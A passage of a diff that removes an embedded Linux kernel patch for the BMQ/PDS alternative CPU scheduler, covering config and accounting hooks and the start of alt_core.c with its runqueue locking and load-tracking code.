-index c2f1fd95a821..41654679b1b2 100644
---- a/kernel/Kconfig.preempt
-+++ b/kernel/Kconfig.preempt
-@@ -117,7 +117,7 @@ config PREEMPT_DYNAMIC
- 
- config SCHED_CORE
- 	bool "Core Scheduling for SMT"
--	depends on SCHED_SMT
-+	depends on SCHED_SMT && !SCHED_ALT
- 	help
- 	  This option permits Core Scheduling, a means of coordinated task
- 	  selection across SMT siblings. When enabled -- see
-diff --git a/kernel/cgroup/cpuset.c b/kernel/cgroup/cpuset.c
-index b474289c15b8..a23224b45b03 100644
---- a/kernel/cgroup/cpuset.c
-+++ b/kernel/cgroup/cpuset.c
-@@ -787,7 +787,7 @@ static int validate_change(struct cpuset *cur, struct cpuset *trial)
- 	return ret;
- }
- 
--#ifdef CONFIG_SMP
-+#if defined(CONFIG_SMP) && !defined(CONFIG_SCHED_ALT)
- /*
-  * Helper routine for generate_sched_domains().
-  * Do cpusets a, b have overlapping effective cpus_allowed masks?
-@@ -1183,7 +1183,7 @@ static void rebuild_sched_domains_locked(void)
- 	/* Have scheduler rebuild the domains */
- 	partition_and_rebuild_sched_domains(ndoms, doms, attr);
- }
--#else /* !CONFIG_SMP */
-+#else /* !CONFIG_SMP || CONFIG_SCHED_ALT */
- static void rebuild_sched_domains_locked(void)
- {
- }
-diff --git a/kernel/delayacct.c b/kernel/delayacct.c
-index e39cb696cfbd..463423572e09 100644
---- a/kernel/delayacct.c
-+++ b/kernel/delayacct.c
-@@ -150,7 +150,7 @@ int delayacct_add_tsk(struct taskstats *d, struct task_struct *tsk)
- 	 */
- 	t1 = tsk->sched_info.pcount;
- 	t2 = tsk->sched_info.run_delay;
--	t3 = tsk->se.sum_exec_runtime;
-+	t3 = tsk_seruntime(tsk);
- 
- 	d->cpu_count += t1;
- 
-diff --git a/kernel/exit.c b/kernel/exit.c
-index 35e0a31a0315..64e368441cf4 100644
---- a/kernel/exit.c
-+++ b/kernel/exit.c
-@@ -125,7 +125,7 @@ static void __exit_signal(struct task_struct *tsk)
- 			sig->curr_target = next_thread(tsk);
- 	}
- 
--	add_device_randomness((const void*) &tsk->se.sum_exec_runtime,
-+	add_device_randomness((const void*) &tsk_seruntime(tsk),
- 			      sizeof(unsigned long long));
- 
- 	/*
-@@ -146,7 +146,7 @@ static void __exit_signal(struct task_struct *tsk)
- 	sig->inblock += task_io_get_inblock(tsk);
- 	sig->oublock += task_io_get_oublock(tsk);
- 	task_io_accounting_add(&sig->ioac, &tsk->ioac);
--	sig->sum_sched_runtime += tsk->se.sum_exec_runtime;
-+	sig->sum_sched_runtime += tsk_seruntime(tsk);
- 	sig->nr_threads--;
- 	__unhash_process(tsk, group_dead);
- 	write_sequnlock(&sig->stats_lock);
-diff --git a/kernel/locking/rtmutex.c b/kernel/locking/rtmutex.c
-index 7779ee8abc2a..5b9893cdfb1b 100644
---- a/kernel/locking/rtmutex.c
-+++ b/kernel/locking/rtmutex.c
-@@ -300,21 +300,25 @@ static __always_inline void
- waiter_update_prio(struct rt_mutex_waiter *waiter, struct task_struct *task)
- {
- 	waiter->prio = __waiter_prio(task);
--	waiter->deadline = task->dl.deadline;
-+	waiter->deadline = __tsk_deadline(task);
- }
- 
- /*
-  * Only use with rt_mutex_waiter_{less,equal}()
-  */
- #define task_to_waiter(p)	\
--	&(struct rt_mutex_waiter){ .prio = __waiter_prio(p), .deadline = (p)->dl.deadline }
-+	&(struct rt_mutex_waiter){ .prio = __waiter_prio(p), .deadline = __tsk_deadline(p) }
- 
- static __always_inline int rt_mutex_waiter_less(struct rt_mutex_waiter *left,
- 						struct rt_mutex_waiter *right)
- {
-+#ifdef CONFIG_SCHED_PDS
-+	return (left->deadline < right->deadline);
-+#else
- 	if (left->prio < right->prio)
- 		return 1;
- 
-+#ifndef CONFIG_SCHED_BMQ
- 	/*
- 	 * If both waiters have dl_prio(), we check the deadlines of the
- 	 * associated tasks.
-@@ -323,16 +327,22 @@ static __always_inline int rt_mutex_waiter_less(struct rt_mutex_waiter *left,
- 	 */
- 	if (dl_prio(left->prio))
- 		return dl_time_before(left->deadline, right->deadline);
-+#endif
- 
- 	return 0;
-+#endif
- }
- 
- static __always_inline int rt_mutex_waiter_equal(struct rt_mutex_waiter *left,
- 						 struct rt_mutex_waiter *right)
- {
-+#ifdef CONFIG_SCHED_PDS
-+	return (left->deadline == right->deadline);
-+#else
- 	if (left->prio != right->prio)
- 		return 0;
- 
-+#ifndef CONFIG_SCHED_BMQ
- 	/*
- 	 * If both waiters have dl_prio(), we check the deadlines of the
- 	 * associated tasks.
-@@ -341,8 +351,10 @@ static __always_inline int rt_mutex_waiter_equal(struct rt_mutex_waiter *left,
- 	 */
- 	if (dl_prio(left->prio))
- 		return left->deadline == right->deadline;
-+#endif
- 
- 	return 1;
-+#endif
- }
- 
- static inline bool rt_mutex_steal(struct rt_mutex_waiter *waiter,
-diff --git a/kernel/sched/Makefile b/kernel/sched/Makefile
-index 976092b7bd45..31d587c16ec1 100644
---- a/kernel/sched/Makefile
-+++ b/kernel/sched/Makefile
-@@ -28,7 +28,12 @@ endif
- # These compilation units have roughly the same size and complexity - so their
- # build parallelizes well and finishes roughly at once:
- #
-+ifdef CONFIG_SCHED_ALT
-+obj-y += alt_core.o
-+obj-$(CONFIG_SCHED_DEBUG) += alt_debug.o
-+else
- obj-y += core.o
- obj-y += fair.o
-+endif
- obj-y += build_policy.o
- obj-y += build_utility.o
-diff --git a/kernel/sched/alt_core.c b/kernel/sched/alt_core.c
-new file mode 100644
-index 000000000000..a9e906b229eb
---- /dev/null
-+++ b/kernel/sched/alt_core.c
-@@ -0,0 +1,7982 @@
-+/*
-+ *  kernel/sched/alt_core.c
-+ *
-+ *  Core alternative kernel scheduler code and related syscalls
-+ *
-+ *  Copyright (C) 1991-2002  Linus Torvalds
-+ *
-+ *  2009-08-13	Brainfuck deadline scheduling policy by Con Kolivas deletes
-+ *		a whole lot of those previous things.
-+ *  2017-09-06	Priority and Deadline based Skip list multiple queue kernel
-+ *		scheduler by Alfred Chen.
-+ *  2019-02-20	BMQ(BitMap Queue) kernel scheduler by Alfred Chen.
-+ */
-+#include <linux/sched/cputime.h>
-+#include <linux/sched/debug.h>
-+#include <linux/sched/isolation.h>
-+#include <linux/sched/loadavg.h>
-+#include <linux/sched/mm.h>
-+#include <linux/sched/nohz.h>
-+#include <linux/sched/stat.h>
-+#include <linux/sched/wake_q.h>
-+
-+#include <linux/blkdev.h>
-+#include <linux/context_tracking.h>
-+#include <linux/cpuset.h>
-+#include <linux/delayacct.h>
-+#include <linux/init_task.h>
-+#include <linux/kcov.h>
-+#include <linux/kprobes.h>
-+#include <linux/nmi.h>
-+#include <linux/scs.h>
-+
-+#include <uapi/linux/sched/types.h>
-+
-+#include <asm/irq_regs.h>
-+#include <asm/switch_to.h>
-+
-+#define CREATE_TRACE_POINTS
-+#include <trace/events/sched.h>
-+#undef CREATE_TRACE_POINTS
-+
-+#include "sched.h"
-+
-+#include "pelt.h"
-+
-+#include "../../io_uring/io-wq.h"
-+#include "../smpboot.h"
-+
-+/*
-+ * Export tracepoints that act as a bare tracehook (ie: have no trace event
-+ * associated with them) to allow external modules to probe them.
-+ */
-+EXPORT_TRACEPOINT_SYMBOL_GPL(pelt_irq_tp);
-+
-+#ifdef CONFIG_SCHED_DEBUG
-+#define sched_feat(x)	(1)
-+/*
-+ * Print a warning if need_resched is set for the given duration (if
-+ * LATENCY_WARN is enabled).
-+ *
-+ * If sysctl_resched_latency_warn_once is set, only one warning will be shown
-+ * per boot.
-+ */
-+__read_mostly int sysctl_resched_latency_warn_ms = 100;
-+__read_mostly int sysctl_resched_latency_warn_once = 1;
-+#else
-+#define sched_feat(x)	(0)
-+#endif /* CONFIG_SCHED_DEBUG */
-+
-+#define ALT_SCHED_VERSION "v6.1-r4"
-+
-+/* rt_prio(prio) defined in include/linux/sched/rt.h */
-+#define rt_task(p)		rt_prio((p)->prio)
-+#define rt_policy(policy)	((policy) == SCHED_FIFO || (policy) == SCHED_RR)
-+#define task_has_rt_policy(p)	(rt_policy((p)->policy))
-+
-+#define STOP_PRIO		(MAX_RT_PRIO - 1)
-+
-+/* Default time slice is 4 in ms, can be set via kernel parameter "sched_timeslice" */
-+u64 sched_timeslice_ns __read_mostly = (4 << 20);
-+
-+static inline void requeue_task(struct task_struct *p, struct rq *rq, int idx);
-+
-+#ifdef CONFIG_SCHED_BMQ
-+#include "bmq.h"
-+#endif
-+#ifdef CONFIG_SCHED_PDS
-+#include "pds.h"
-+#endif
-+
-+static int __init sched_timeslice(char *str)
-+{
-+	int timeslice_ms;
-+
-+	get_option(&str, &timeslice_ms);
-+	if (2 != timeslice_ms)
-+		timeslice_ms = 4;
-+	sched_timeslice_ns = timeslice_ms << 20;
-+	sched_timeslice_imp(timeslice_ms);
-+
-+	return 0;
-+}
-+early_param("sched_timeslice", sched_timeslice);
-+
-+/* Reschedule if less than this many μs left */
-+#define RESCHED_NS		(100 << 10)
-+
-+/**
-+ * sched_yield_type - Choose what sort of yield sched_yield will perform.
-+ * 0: No yield.
-+ * 1: Deboost and requeue task. (default)
-+ * 2: Set rq skip task.
-+ */
-+int sched_yield_type __read_mostly = 1;
-+
-+#ifdef CONFIG_SMP
-+static cpumask_t sched_rq_pending_mask ____cacheline_aligned_in_smp;
-+
-+DEFINE_PER_CPU(cpumask_t [NR_CPU_AFFINITY_LEVELS], sched_cpu_topo_masks);
-+DEFINE_PER_CPU(cpumask_t *, sched_cpu_llc_mask);
-+DEFINE_PER_CPU(cpumask_t *, sched_cpu_topo_end_mask);
-+
-+#ifdef CONFIG_SCHED_SMT
-+DEFINE_STATIC_KEY_FALSE(sched_smt_present);
-+EXPORT_SYMBOL_GPL(sched_smt_present);
-+#endif
-+
-+/*
-+ * Keep a unique ID per domain (we use the first CPUs number in the cpumask of
-+ * the domain), this allows us to quickly tell if two cpus are in the same cache
-+ * domain, see cpus_share_cache().
-+ */
-+DEFINE_PER_CPU(int, sd_llc_id);
-+#endif /* CONFIG_SMP */
-+
-+static DEFINE_MUTEX(sched_hotcpu_mutex);
-+
-+DEFINE_PER_CPU_SHARED_ALIGNED(struct rq, runqueues);
-+
-+#ifndef prepare_arch_switch
-+# define prepare_arch_switch(next)	do { } while (0)
-+#endif
-+#ifndef finish_arch_post_lock_switch
-+# define finish_arch_post_lock_switch()	do { } while (0)
-+#endif
-+
-+#ifdef CONFIG_SCHED_SMT
-+static cpumask_t sched_sg_idle_mask ____cacheline_aligned_in_smp;
-+#endif
-+static cpumask_t sched_preempt_mask[SCHED_QUEUE_BITS] ____cacheline_aligned_in_smp;
-+static cpumask_t *const sched_idle_mask = &sched_preempt_mask[0];
-+
-+/* sched_queue related functions */
-+static inline void sched_queue_init(struct sched_queue *q)
-+{
-+	int i;
-+
-+	bitmap_zero(q->bitmap, SCHED_QUEUE_BITS);
-+	for(i = 0; i < SCHED_BITS; i++)
-+		INIT_LIST_HEAD(&q->heads[i]);
-+}
-+
-+/*
-+ * Init idle task and put into queue structure of rq
-+ * IMPORTANT: may be called multiple times for a single cpu
-+ */
-+static inline void sched_queue_init_idle(struct sched_queue *q,
-+					 struct task_struct *idle)
-+{
-+	idle->sq_idx = IDLE_TASK_SCHED_PRIO;
-+	INIT_LIST_HEAD(&q->heads[idle->sq_idx]);
-+	list_add(&idle->sq_node, &q->heads[idle->sq_idx]);
-+}
-+
-+static inline void
-+clear_recorded_preempt_mask(int pr, int low, int high, int cpu)
-+{
-+	if (low < pr && pr <= high)
-+		cpumask_clear_cpu(cpu, sched_preempt_mask + SCHED_QUEUE_BITS - pr);
-+}
-+
-+static inline void
-+set_recorded_preempt_mask(int pr, int low, int high, int cpu)
-+{
-+	if (low < pr && pr <= high)
-+		cpumask_set_cpu(cpu, sched_preempt_mask + SCHED_QUEUE_BITS - pr);
-+}
-+
-+static atomic_t sched_prio_record = ATOMIC_INIT(0);
-+
-+/* water mark related functions */
-+static inline void update_sched_preempt_mask(struct rq *rq)
-+{
-+	unsigned long prio = find_first_bit(rq->queue.bitmap, SCHED_QUEUE_BITS);
-+	unsigned long last_prio = rq->prio;
-+	int cpu, pr;
-+
-+	if (prio == last_prio)
-+		return;
-+
-+	rq->prio = prio;
-+	cpu = cpu_of(rq);
-+	pr = atomic_read(&sched_prio_record);
-+
-+	if (prio < last_prio) {
-+		if (IDLE_TASK_SCHED_PRIO == last_prio) {
-+			cpumask_clear_cpu(cpu, sched_idle_mask);
-+			last_prio -= 2;
-+#ifdef CONFIG_SCHED_SMT
-+			if (static_branch_likely(&sched_smt_present))
-+				cpumask_andnot(&sched_sg_idle_mask,
-+					       &sched_sg_idle_mask, cpu_smt_mask(cpu));
-+#endif
-+		}
-+		clear_recorded_preempt_mask(pr, prio, last_prio, cpu);
-+
-+		return;
-+	}
-+	/* last_prio < prio */
-+	if (IDLE_TASK_SCHED_PRIO == prio) {
-+		cpumask_set_cpu(cpu, sched_idle_mask);
-+		prio -= 2;
-+#ifdef CONFIG_SCHED_SMT
-+		if (static_branch_likely(&sched_smt_present)) {
-+			cpumask_t tmp;
-+
-+			cpumask_and(&tmp, cpu_smt_mask(cpu), sched_idle_mask);
-+			if (cpumask_equal(&tmp, cpu_smt_mask(cpu)))
-+				cpumask_or(&sched_sg_idle_mask,
-+					   &sched_sg_idle_mask, cpu_smt_mask(cpu));
-+		}
-+#endif
-+	}
-+	set_recorded_preempt_mask(pr, last_prio, prio, cpu);
-+}
-+
-+/*
-+ * This routine assume that the idle task always in queue
-+ */
-+static inline struct task_struct *sched_rq_first_task(struct rq *rq)
-+{
-+	unsigned long idx = find_first_bit(rq->queue.bitmap, SCHED_QUEUE_BITS);
-+	const struct list_head *head = &rq->queue.heads[sched_prio2idx(idx, rq)];
-+
-+	return list_first_entry(head, struct task_struct, sq_node);
-+}
-+
-+static inline struct task_struct *
-+sched_rq_next_task(struct task_struct *p, struct rq *rq)
-+{
-+	unsigned long idx = p->sq_idx;
-+	struct list_head *head = &rq->queue.heads[idx];
-+
-+	if (list_is_last(&p->sq_node, head)) {
-+		idx = find_next_bit(rq->queue.bitmap, SCHED_QUEUE_BITS,
-+				    sched_idx2prio(idx, rq) + 1);
-+		head = &rq->queue.heads[sched_prio2idx(idx, rq)];
-+
-+		return list_first_entry(head, struct task_struct, sq_node);
-+	}
-+
-+	return list_next_entry(p, sq_node);
-+}
-+
-+static inline struct task_struct *rq_runnable_task(struct rq *rq)
-+{
-+	struct task_struct *next = sched_rq_first_task(rq);
-+
-+	if (unlikely(next == rq->skip))
-+		next = sched_rq_next_task(next, rq);
-+
-+	return next;
-+}
-+
-+/*
-+ * Serialization rules:
-+ *
-+ * Lock order:
-+ *
-+ *   p->pi_lock
-+ *     rq->lock
-+ *       hrtimer_cpu_base->lock (hrtimer_start() for bandwidth controls)
-+ *
-+ *  rq1->lock
-+ *    rq2->lock  where: rq1 < rq2
-+ *
-+ * Regular state:
-+ *
-+ * Normal scheduling state is serialized by rq->lock. __schedule() takes the
-+ * local CPU's rq->lock, it optionally removes the task from the runqueue and
-+ * always looks at the local rq data structures to find the most eligible task
-+ * to run next.
-+ *
-+ * Task enqueue is also under rq->lock, possibly taken from another CPU.
-+ * Wakeups from another LLC domain might use an IPI to transfer the enqueue to
-+ * the local CPU to avoid bouncing the runqueue state around [ see
-+ * ttwu_queue_wakelist() ]
-+ *
-+ * Task wakeup, specifically wakeups that involve migration, are horribly
-+ * complicated to avoid having to take two rq->locks.
-+ *
-+ * Special state:
-+ *
-+ * System-calls and anything external will use task_rq_lock() which acquires
-+ * both p->pi_lock and rq->lock. As a consequence the state they change is
-+ * stable while holding either lock:
-+ *
-+ *  - sched_setaffinity()/
-+ *    set_cpus_allowed_ptr():	p->cpus_ptr, p->nr_cpus_allowed
-+ *  - set_user_nice():		p->se.load, p->*prio
-+ *  - __sched_setscheduler():	p->sched_class, p->policy, p->*prio,
-+ *				p->se.load, p->rt_priority,
-+ *				p->dl.dl_{runtime, deadline, period, flags, bw, density}
-+ *  - sched_setnuma():		p->numa_preferred_nid
-+ *  - sched_move_task():        p->sched_task_group
-+ *  - uclamp_update_active()	p->uclamp*
-+ *
-+ * p->state <- TASK_*:
-+ *
-+ *   is changed locklessly using set_current_state(), __set_current_state() or
-+ *   set_special_state(), see their respective comments, or by
-+ *   try_to_wake_up(). This latter uses p->pi_lock to serialize against
-+ *   concurrent self.
-+ *
-+ * p->on_rq <- { 0, 1 = TASK_ON_RQ_QUEUED, 2 = TASK_ON_RQ_MIGRATING }:
-+ *
-+ *   is set by activate_task() and cleared by deactivate_task(), under
-+ *   rq->lock. Non-zero indicates the task is runnable, the special
-+ *   ON_RQ_MIGRATING state is used for migration without holding both
-+ *   rq->locks. It indicates task_cpu() is not stable, see task_rq_lock().
-+ *
-+ * p->on_cpu <- { 0, 1 }:
-+ *
-+ *   is set by prepare_task() and cleared by finish_task() such that it will be
-+ *   set before p is scheduled-in and cleared after p is scheduled-out, both
-+ *   under rq->lock. Non-zero indicates the task is running on its CPU.
-+ *
-+ *   [ The astute reader will observe that it is possible for two tasks on one
-+ *     CPU to have ->on_cpu = 1 at the same time. ]
-+ *
-+ * task_cpu(p): is changed by set_task_cpu(), the rules are:
-+ *
-+ *  - Don't call set_task_cpu() on a blocked task:
-+ *
-+ *    We don't care what CPU we're not running on, this simplifies hotplug,
-+ *    the CPU assignment of blocked tasks isn't required to be valid.
-+ *
-+ *  - for try_to_wake_up(), called under p->pi_lock:
-+ *
-+ *    This allows try_to_wake_up() to only take one rq->lock, see its comment.
-+ *
-+ *  - for migration called under rq->lock:
-+ *    [ see task_on_rq_migrating() in task_rq_lock() ]
-+ *
-+ *    o move_queued_task()
-+ *    o detach_task()
-+ *
-+ *  - for migration called under double_rq_lock():
-+ *
-+ *    o __migrate_swap_task()
-+ *    o push_rt_task() / pull_rt_task()
-+ *    o push_dl_task() / pull_dl_task()
-+ *    o dl_task_offline_migration()
-+ *
-+ */
-+
-+/*
-+ * Context: p->pi_lock
-+ */
-+static inline struct rq
-+*__task_access_lock(struct task_struct *p, raw_spinlock_t **plock)
-+{
-+	struct rq *rq;
-+	for (;;) {
-+		rq = task_rq(p);
-+		if (p->on_cpu || task_on_rq_queued(p)) {
-+			raw_spin_lock(&rq->lock);
-+			if (likely((p->on_cpu || task_on_rq_queued(p))
-+				   && rq == task_rq(p))) {
-+				*plock = &rq->lock;
-+				return rq;
-+			}
-+			raw_spin_unlock(&rq->lock);
-+		} else if (task_on_rq_migrating(p)) {
-+			do {
-+				cpu_relax();
-+			} while (unlikely(task_on_rq_migrating(p)));
-+		} else {
-+			*plock = NULL;
-+			return rq;
-+		}
-+	}
-+}
-+
-+static inline void
-+__task_access_unlock(struct task_struct *p, raw_spinlock_t *lock)
-+{
-+	if (NULL != lock)
-+		raw_spin_unlock(lock);
-+}
-+
-+static inline struct rq
-+*task_access_lock_irqsave(struct task_struct *p, raw_spinlock_t **plock,
-+			  unsigned long *flags)
-+{
-+	struct rq *rq;
-+	for (;;) {
-+		rq = task_rq(p);
-+		if (p->on_cpu || task_on_rq_queued(p)) {
-+			raw_spin_lock_irqsave(&rq->lock, *flags);
-+			if (likely((p->on_cpu || task_on_rq_queued(p))
-+				   && rq == task_rq(p))) {
-+				*plock = &rq->lock;
-+				return rq;
-+			}
-+			raw_spin_unlock_irqrestore(&rq->lock, *flags);
-+		} else if (task_on_rq_migrating(p)) {
-+			do {
-+				cpu_relax();
-+			} while (unlikely(task_on_rq_migrating(p)));
-+		} else {
-+			raw_spin_lock_irqsave(&p->pi_lock, *flags);
-+			if (likely(!p->on_cpu && !p->on_rq &&
-+				   rq == task_rq(p))) {
-+				*plock = &p->pi_lock;
-+				return rq;
-+			}
-+			raw_spin_unlock_irqrestore(&p->pi_lock, *flags);
-+		}
-+	}
-+}
-+
-+static inline void
-+task_access_unlock_irqrestore(struct task_struct *p, raw_spinlock_t *lock,
-+			      unsigned long *flags)
-+{
-+	raw_spin_unlock_irqrestore(lock, *flags);
-+}
-+
-+/*
-+ * __task_rq_lock - lock the rq @p resides on.
-+ */
-+struct rq *__task_rq_lock(struct task_struct *p, struct rq_flags *rf)
-+	__acquires(rq->lock)
-+{
-+	struct rq *rq;
-+
-+	lockdep_assert_held(&p->pi_lock);
-+
-+	for (;;) {
-+		rq = task_rq(p);
-+		raw_spin_lock(&rq->lock);
-+		if (likely(rq == task_rq(p) && !task_on_rq_migrating(p)))
-+			return rq;
-+		raw_spin_unlock(&rq->lock);
-+
-+		while (unlikely(task_on_rq_migrating(p)))
-+			cpu_relax();
-+	}
-+}
-+
-+/*
-+ * task_rq_lock - lock p->pi_lock and lock the rq @p resides on.
-+ */
-+struct rq *task_rq_lock(struct task_struct *p, struct rq_flags *rf)
-+	__acquires(p->pi_lock)
-+	__acquires(rq->lock)
-+{
-+	struct rq *rq;
-+
-+	for (;;) {
-+		raw_spin_lock_irqsave(&p->pi_lock, rf->flags);
-+		rq = task_rq(p);
-+		raw_spin_lock(&rq->lock);
-+		/*
-+		 *	move_queued_task()		task_rq_lock()
-+		 *
-+		 *	ACQUIRE (rq->lock)
-+		 *	[S] ->on_rq = MIGRATING		[L] rq = task_rq()
-+		 *	WMB (__set_task_cpu())		ACQUIRE (rq->lock);
-+		 *	[S] ->cpu = new_cpu		[L] task_rq()
-+		 *					[L] ->on_rq
-+		 *	RELEASE (rq->lock)
-+		 *
-+		 * If we observe the old CPU in task_rq_lock(), the acquire of
-+		 * the old rq->lock will fully serialize against the stores.
-+		 *
-+		 * If we observe the new CPU in task_rq_lock(), the address
-+		 * dependency headed by '[L] rq = task_rq()' and the acquire
-+		 * will pair with the WMB to ensure we then also see migrating.
-+		 */
-+		if (likely(rq == task_rq(p) && !task_on_rq_migrating(p))) {
-+			return rq;
-+		}
-+		raw_spin_unlock(&rq->lock);
-+		raw_spin_unlock_irqrestore(&p->pi_lock, rf->flags);
-+
-+		while (unlikely(task_on_rq_migrating(p)))
-+			cpu_relax();
-+	}
-+}
-+
-+static inline void
-+rq_lock_irqsave(struct rq *rq, struct rq_flags *rf)
-+	__acquires(rq->lock)
-+{
-+	raw_spin_lock_irqsave(&rq->lock, rf->flags);
-+}
-+
-+static inline void
-+rq_unlock_irqrestore(struct rq *rq, struct rq_flags *rf)
-+	__releases(rq->lock)
-+{
-+	raw_spin_unlock_irqrestore(&rq->lock, rf->flags);
-+}
-+
-+void raw_spin_rq_lock_nested(struct rq *rq, int subclass)
-+{
-+	raw_spinlock_t *lock;
-+
-+	/* Matches synchronize_rcu() in __sched_core_enable() */
-+	preempt_disable();
-+
-+	for (;;) {
-+		lock = __rq_lockp(rq);
-+		raw_spin_lock_nested(lock, subclass);
-+		if (likely(lock == __rq_lockp(rq))) {
-+			/* preempt_count *MUST* be > 1 */
-+			preempt_enable_no_resched();
-+			return;
-+		}
-+		raw_spin_unlock(lock);
-+	}
-+}
-+
-+void raw_spin_rq_unlock(struct rq *rq)
-+{
-+	raw_spin_unlock(rq_lockp(rq));
-+}
-+
-+/*
-+ * RQ-clock updating methods:
-+ */
-+
-+static void update_rq_clock_task(struct rq *rq, s64 delta)
-+{
-+/*
-+ * In theory, the compile should just see 0 here, and optimize out the call
-+ * to sched_rt_avg_update. But I don't trust it...
-+ */
-+	s64 __maybe_unused steal = 0, irq_delta = 0;
-+
-+#ifdef CONFIG_IRQ_TIME_ACCOUNTING
-+	irq_delta = irq_time_read(cpu_of(rq)) - rq->prev_irq_time;
-+
-+	/*
-+	 * Since irq_time is only updated on {soft,}irq_exit, we might run into
-+	 * this case when a previous update_rq_clock() happened inside a
-+	 * {soft,}irq region.
-+	 *
-+	 * When this happens, we stop ->clock_task and only update the
-+	 * prev_irq_time stamp to account for the part that fit, so that a next
-+	 * update will consume the rest. This ensures ->clock_task is
-+	 * monotonic.
-+	 *
-+	 * It does however cause some slight miss-attribution of {soft,}irq
-+	 * time, a more accurate solution would be to update the irq_time using
-+	 * the current rq->clock timestamp, except that would require using
-+	 * atomic ops.
-+	 */
-+	if (irq_delta > delta)
-+		irq_delta = delta;
-+
-+	rq->prev_irq_time += irq_delta;
-+	delta -= irq_delta;
-+	psi_account_irqtime(rq->curr, irq_delta);
-+#endif
-+#ifdef CONFIG_PARAVIRT_TIME_ACCOUNTING
-+	if (static_key_false((&paravirt_steal_rq_enabled))) {
-+		steal = paravirt_steal_clock(cpu_of(rq));
-+		steal -= rq->prev_steal_time_rq;
-+
-+		if (unlikely(steal > delta))
-+			steal = delta;
-+
-+		rq->prev_steal_time_rq += steal;
-+		delta -= steal;
-+	}
-+#endif
-+
-+	rq->clock_task += delta;
-+
-+#ifdef CONFIG_HAVE_SCHED_AVG_IRQ
-+	if ((irq_delta + steal))
-+		update_irq_load_avg(rq, irq_delta + steal);
-+#endif
-+}
-+
-+static inline void update_rq_clock(struct rq *rq)
-+{
-+	s64 delta = sched_clock_cpu(cpu_of(rq)) - rq->clock;
-+
-+	if (unlikely(delta <= 0))
-+		return;
-+	rq->clock += delta;
-+	update_rq_time_edge(rq);
-+	update_rq_clock_task(rq, delta);
-+}
-+
-+/*
-+ * RQ Load update routine
-+ */
-+#define RQ_LOAD_HISTORY_BITS		(sizeof(s32) * 8ULL)
-+#define RQ_UTIL_SHIFT			(8)
-+#define RQ_LOAD_HISTORY_TO_UTIL(l)	(((l) >> (RQ_LOAD_HISTORY_BITS - 1 - RQ_UTIL_SHIFT)) & 0xff)
-+
-+#define LOAD_BLOCK(t)		((t) >> 17)
-+#define LOAD_HALF_BLOCK(t)	((t) >> 16)
-+#define BLOCK_MASK(t)		((t) & ((0x01 << 18) - 1))
-+#define LOAD_BLOCK_BIT(b)	(1UL << (RQ_LOAD_HISTORY_BITS - 1 - (b)))
-+#define CURRENT_LOAD_BIT	LOAD_BLOCK_BIT(0)
-+
-+static inline void rq_load_update(struct rq *rq)
-+{
-+	u64 time = rq->clock;
-+	u64 delta = min(LOAD_BLOCK(time) - LOAD_BLOCK(rq->load_stamp),
-+			RQ_LOAD_HISTORY_BITS - 1);
-+	u64 prev = !!(rq->load_history & CURRENT_LOAD_BIT);
-+	u64 curr = !!rq->nr_running;
-+
-+	if (delta) {
-+		rq->load_history = rq->load_history >> delta;
-+
-+		if (delta < RQ_UTIL_SHIFT) {
-+			rq->load_block += (~BLOCK_MASK(rq->load_stamp)) * prev;
-+			if (!!LOAD_HALF_BLOCK(rq->load_block) ^ curr)
-+				rq->load_history ^= LOAD_BLOCK_BIT(delta);
-+		}
-+
-+		rq->load_block = BLOCK_MASK(time) * prev;
-+	} else {
-+		rq->load_block += (time - rq->load_stamp) * prev;
-+	}
-+	if (prev ^ curr)
-+		rq->load_history ^= CURRENT_LOAD_BIT;
-+	rq->load_stamp = time;
-+}
-+
-+unsigned long rq_load_util(struct rq *rq, unsigned long max)
-+{
-+	return RQ_LOAD_HISTORY_TO_UTIL(rq->load_history) * (max >> RQ_UTIL_SHIFT);
-+}
-+
-+#ifdef CONFIG_SMP
-+unsigned long sched_cpu_util(int cpu)
-+{
-+	return rq_load_util(cpu_rq(cpu), arch_scale_cpu_capacity(cpu));
-+}
-+#endif /* CONFIG_SMP */
-+
-+#ifdef CONFIG_CPU_FREQ
-+/**
-+ * cpufreq_update_util - Take a note about CPU utilization changes.
-+ * @rq: Runqueue to carry out the update for.
-+ * @flags: Update reason flags.
-+ *
-+ * This function is called by the scheduler on the CPU whose utilization is
-+ * being updated.
-+ *
-+ * It can only be called from RCU-sched read-side critical sections.
-+ *
-+ * The way cpufreq is currently arranged requires it to evaluate the CPU
-+ * performance state (frequency/voltage) on a regular basis to prevent it from
-+ * being stuck in a completely inadequate performance level for too long.
-+ * That is not guaranteed to happen if the updates are only triggered from CFS
-+ * and DL, though, because they may not be coming in if only RT tasks are
-+ * active all the time (or there are RT tasks only).
-+ *
-+ * As a workaround for that issue, this function is called periodically by the
-+ * RT sched class to trigger extra cpufreq updates to prevent it from stalling,
-+ * but that really is a band-aid.  Going forward it should be replaced with
-+ * solutions targeted more specifically at RT tasks.
-+ */
-+static inline void cpufreq_update_util(struct rq *rq, unsigned int flags)
-+{
-+	struct update_util_data *data;
-+
-+#ifdef CONFIG_SMP
-+	rq_load_update(rq);
-+#endif
-+	data = rcu_dereference_sched(*per_cpu_ptr(&cpufreq_update_util_data,
-+						  cpu_of(rq)));
-+	if (data)
-+		data->func(data, rq_clock(rq), flags);
-+}
-+#else
-+static inline void cpufreq_update_util(struct rq *rq, unsigned int flags)
-+{
-+#ifdef CONFIG_SMP
-+	rq_load_update(rq);
-+#endif
-+}
-+#endif /* CONFIG_CPU_FREQ */
-+
-+#ifdef CONFIG_NO_HZ_FULL
-+/*
-+ * Tick may be needed by tasks in the runqueue depending on their policy and
-+ * requirements. If tick is needed, lets send the target an IPI to kick it out
-+ * of nohz mode if necessary.
-+ */
-+static inline void sched_update_tick_dependency(struct rq *rq)
-+{
-+	int cpu = cpu_of(rq);
-+
-+	if (!tick_nohz_full_cpu(cpu))
-+		return;
-+
-+	if (rq->nr_running < 2)
-+		tick_nohz_dep_clear_cpu(cpu, TICK_DEP_BIT_SCHED);
-+	else
-+		tick_nohz_dep_set_cpu(cpu, TICK_DEP_BIT_SCHED);
-+}
-+#else /* !CONFIG_NO_HZ_FULL */
-+static inline void sched_update_tick_dependency(struct rq *rq) { }
-+#endif
-+
-+bool sched_task_on_rq(struct task_struct *p)
-+{
-+	return task_on_rq_queued(p);
-+}
-+
-+unsigned long get_wchan(struct task_struct *p)
-+{
-+	unsigned long ip = 0;
-+	unsigned int state;
-+
-+	if (!p || p == current)
-+		return 0;
-+
-+	/* Only get wchan if task is blocked and we can keep it that way. */
-+	raw_spin_lock_irq(&p->pi_lock);
-+	state = READ_ONCE(p->__state);
